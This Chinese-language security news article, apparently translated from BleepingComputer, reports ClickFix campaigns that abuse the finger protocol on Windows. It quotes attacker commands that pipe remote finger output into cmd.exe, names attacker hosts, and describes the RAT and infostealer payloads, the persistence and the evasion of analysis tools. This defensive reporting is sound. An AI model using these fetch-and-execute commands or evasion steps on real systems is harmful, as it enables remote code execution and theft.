有著數(shù)十年歷史的finger協(xié)議正重新活躍，威脅者借助這一協(xié)議獲取遠程指令，在Windows設備上執(zhí)行惡意操作。

過去，人們通過Finger協(xié)議，在Unix與Linux系統(tǒng)中使用finger命令查詢本地及遠程用戶信息，該命令后續(xù)也被加入Windows系統(tǒng)。盡管目前仍受支持，但相較于數(shù)十年前的普及度，如今其使用率已大幅下降。

執(zhí)行finger命令后，會返回用戶的基礎信息，包括登錄名、用戶名（若在/etc/passwd中設置）、主目錄、電話號碼、最后活躍時間及其他詳情。

手指命令輸出

近期，多起惡意攻擊活動開始利用Finger協(xié)議，疑似通過“ClickFix攻擊”獲取指令并在設備上執(zhí)行。

這并非finger命令首次被如此濫用——早在2020年，研究人員就曾發(fā)出警告，指出該命令已被用作“ Living-off-the-Land Binary（ LOLBIN，合法系統(tǒng)工具濫用）”，用于下載惡意軟件并規(guī)避檢測。

finger命令遭惡意濫用

上月，網(wǎng)絡安全研究員分享了一個批處理文件。該文件執(zhí)行后，會運行“finger root@finger.nateams[.]com”命令，從遠程finger服務器獲取指令，再通過管道符傳遞給cmd.exe在本地執(zhí)行。

手指命令輸出

目前該服務器已無法訪問，但MalwareHunterTeam又發(fā)現(xiàn)了更多利用finger命令的惡意軟件樣本與攻擊活動。例如，Reddit平臺上有用戶近期發(fā)文警示，稱自己遭遇了一場偽裝成驗證碼驗證的ClickFix攻擊——攻擊者誘導其運行一條Windows命令，以“證明自己是人類”。

盡管目前該服務器已不再響應finger請求，但另一位Reddit用戶捕獲了此前的輸出結(jié)果。這類攻擊將Finger協(xié)議用作遠程腳本傳輸工具：通過運行“finger vke@finger.cloudmega[.]org”命令，將輸出結(jié)果通過管道符傳遞給Windows命令處理器cmd.exe。

這一操作會觸發(fā)獲取到的指令執(zhí)行：創(chuàng)建隨機命名的路徑，將curl.exe復制為隨機文件名，通過重命名后的curl程序從cloudmega[.]org下載偽裝成PDF文件的壓縮包，并解壓出一個Python惡意軟件包。

偽裝成PDF的檔案內(nèi)容

隨后，系統(tǒng)會通過“pythonw.exe __init__.py”命令執(zhí)行該Python程序。最終執(zhí)行的指令會向攻擊者的服務器回傳“執(zhí)行成功”的確認信息，同時向用戶顯示偽造的“驗證你是人類”提示框。

目前尚不清楚該Python惡意軟件包的具體用途，但從一個關聯(lián)批處理文件可推斷，其應為一款信息竊取工具。

安全員還發(fā)現(xiàn)了另一項類似攻擊活動：通過“finger Kove2@api.metrics-strange.com | cmd”命令獲取并執(zhí)行指令，操作流程與上述ClickFix攻擊幾乎一致。

finger命令的輸出

分析發(fā)現(xiàn)，這一攻擊手段更為成熟——指令會先檢測設備中是否存在惡意軟件研究常用工具，若發(fā)現(xiàn)則終止攻擊。這些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg及ProcessHacker。

若未檢測到惡意軟件分析工具，指令會下載偽裝成PDF的壓縮包并解壓。但與此前不同的是，該壓縮包中并非Python惡意軟件包，而是NetSupport Manager遠程訪問工具（RAT）安裝包。

NetSupport Manager RAT

隨后，指令會配置一個計劃任務，確保用戶登錄時自動啟動該遠程訪問惡意軟件。

目前來看，此類finger命令濫用活動似乎由單一威脅者發(fā)起，且主要通過ClickFix攻擊實施。但鑒于仍有用戶持續(xù)上當，相關攻擊活動需引起高度警惕。

對于防御方而言，阻止finger命令濫用的最佳方式是攔截流向TCP 79端口的出站流量——該端口是Finger協(xié)議用于連接守護進程的專用端口。

參考及來源：https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/